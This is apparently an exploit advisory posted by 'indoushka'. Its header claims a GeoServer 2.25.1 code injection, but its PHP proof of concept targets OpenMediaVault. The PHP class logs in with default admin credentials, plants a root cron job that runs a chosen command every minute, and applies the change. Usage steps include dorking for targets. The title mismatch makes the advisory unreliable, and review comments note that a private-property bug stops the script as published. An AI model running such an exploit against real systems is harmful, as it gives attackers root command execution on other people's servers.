GeoServer version 2.25.1 suffers from a PHP code injection vulnerability.
425286b969561badddd4d4255537956eb91fd2c63a438e26b79b655873664851
=============================================================================================================================================
| # Title : GeoServer 2.25.1 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://github.com/geoserver/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engines.
[+] Uses cURL to send the remote command.
[+] Line 118 set your target .
[+] Line 123 set your command to execute.
[+] Save the code as poc.php.
[+] Usage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for the OpenMediaVault JSON-RPC endpoint (`/rpc.php`).
 *
 * NOTE(review): every request in this class goes to OpenMediaVault's rpc.php and the
 * login banner names OpenMediaVault; nothing here touches GeoServer, so the advisory
 * header above appears to be mislabeled.
 *
 * Request sequence, all JSON POSTs to <targetUri>/rpc.php:
 *   Session.login -> System.getInformation -> Cron.set (root, every-minute job)
 *   -> Config.applyChangesBg -> Cron.delete (only when not persistent).
 * From a defender's side, a root "userdefined" cron entry created through the RPC
 * API followed immediately by applyChangesBg is the observable artefact.
 */
class OpenMediaVaultExploit
{
// Base URL of the target; '/rpc.php' is appended on every call.
private $targetUri;
// Credentials sent to Session.login (and echoed to stdout by login()).
private $username;
private $password;
// When false, removePayload() deletes the cron entry after execution.
private $persistent;
// UUID returned by Cron.set; consumed by removePayload().
private $cronUuid;
// Version string read in executeCommand(). Declared private and never assigned
// inside the class; the only visible assignment is from the usage block below.
private $versionNumber;
/**
 * @param string $targetUri  base URL, no trailing '/rpc.php'
 * @param string $username
 * @param string $password
 * @param bool   $persistent leave the cron entry in place when true
 */
public function __construct($targetUri, $username, $password, $persistent = false)
{
$this->targetUri = $targetUri;
$this->username = $username;
$this->password = $password;
$this->persistent = $persistent;
}
/**
 * POST $data as a JSON body and return the decoded JSON response.
 *
 * No session cookie is stored or replayed here, and curl_exec()'s return value is
 * passed to json_decode() without a `false` check, so a transport failure yields
 * null rather than an error.
 *
 * @param string $url
 * @param array  $data
 * @return mixed decoded response (array) or null
 */
private function sendRequest($url, $data)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json'
]);
$response = curl_exec($ch);
curl_close($ch);
return json_decode($response, true);
}
/**
 * Call Session.login with the stored credentials.
 *
 * Prints the password in clear text to stdout before the request.
 *
 * @return bool true only when the response carries 'authenticated' === true
 */
public function login()
{
echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";
$data = [
'service' => 'Session',
'method' => 'login',
'params' => [
'username' => $this->username,
'password' => $this->password
],
'options' => null
];
$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
return isset($response['authenticated']) && $response['authenticated'] === true;
}
/**
 * Call System.getInformation and return the raw decoded response.
 *
 * Despite the banner text, no vulnerability check happens here; the caller
 * passes the result to checkVersion().
 *
 * @return mixed decoded response or null
 */
public function checkTarget()
{
echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";
$data = [
'service' => 'System',
'method' => 'getInformation',
'params' => null
];
$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
return $response;
}
/**
 * Extract a bare version string from a System.getInformation response.
 *
 * Takes response.version, keeps only the part before the first '(' and strips
 * all whitespace. Returns null when the response or the version key is missing.
 *
 * @param mixed $response
 * @return string|null
 */
public function checkVersion($response)
{
if (!empty($response)) {
$version = $response['response']['version'] ?? null;
return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;
}
return null;
}
/**
 * Create a root cron entry via Cron.set and apply the config change.
 *
 * @param string $cmd command stored in the cron entry
 * @return void
 */
public function executeCommand($cmd)
{
echo "Executing command...\n";
// Both comparisons are plain PHP string comparisons on $versionNumber, not a
// semantic version comparison; they pick the schedule shape and the uuid value.
$schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';
$uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';
$data = [
'service' => 'Cron',
'method' => 'set',
'params' => [
'uuid' => $uuid,
'enable' => true,
'execution' => 'exactly',
// '*' in every field: the job is scheduled every minute.
'minute' => $schedule,
'hour' => $schedule,
'dayofmonth' => $schedule,
'month' => $schedule,
'dayofweek' => $schedule,
'username' => 'root',
'command' => $cmd,
'sendemail' => false,
'comment' => '',
'type' => 'userdefined'
],
'options' => null
];
$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
// Remembered so removePayload() can delete exactly this entry.
$this->cronUuid = $response['response']['uuid'] ?? '';
$this->applyConfigChanges();
echo "Cron payload execution triggered.\n";
}
/**
 * Call Config.applyChangesBg with an empty module list so the pending
 * configuration change (the cron entry) takes effect.
 *
 * @return void
 */
public function applyConfigChanges()
{
$data = [
'service' => 'Config',
'method' => 'applyChangesBg',
'params' => [
'modules' => [],
'force' => false
],
'options' => null
];
$this->sendRequest($this->targetUri . '/rpc.php', $data);
}
/**
 * Delete the cron entry created by executeCommand() unless $persistent is set.
 *
 * Success is judged on the truthiness of the decoded response only; a transport
 * failure (null) is reported as "cannot access".
 *
 * @return void
 */
public function removePayload()
{
if (!$this->persistent) {
$data = [
'service' => 'Cron',
'method' => 'delete',
'params' => [
'uuid' => $this->cronUuid
]
];
$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
if ($response) {
$this->applyConfigChanges();
echo "Cron payload entry successfully removed.\n";
} else {
echo "Cannot access cron services to remove payload.\n";
}
}
}
}
// Usage
// Driver: login, read version, create the cron entry, then clean it up.
$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);
if ($exploit->login()) {
$response = $exploit->checkTarget();
if ($response) {
// NOTE(review): $versionNumber is declared private on the class; writing it from
// outside the class is rejected by PHP, so this script as published stops here.
$exploit->versionNumber = $exploit->checkVersion($response);
$exploit->executeCommand('your-command-here');
$exploit->removePayload();
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================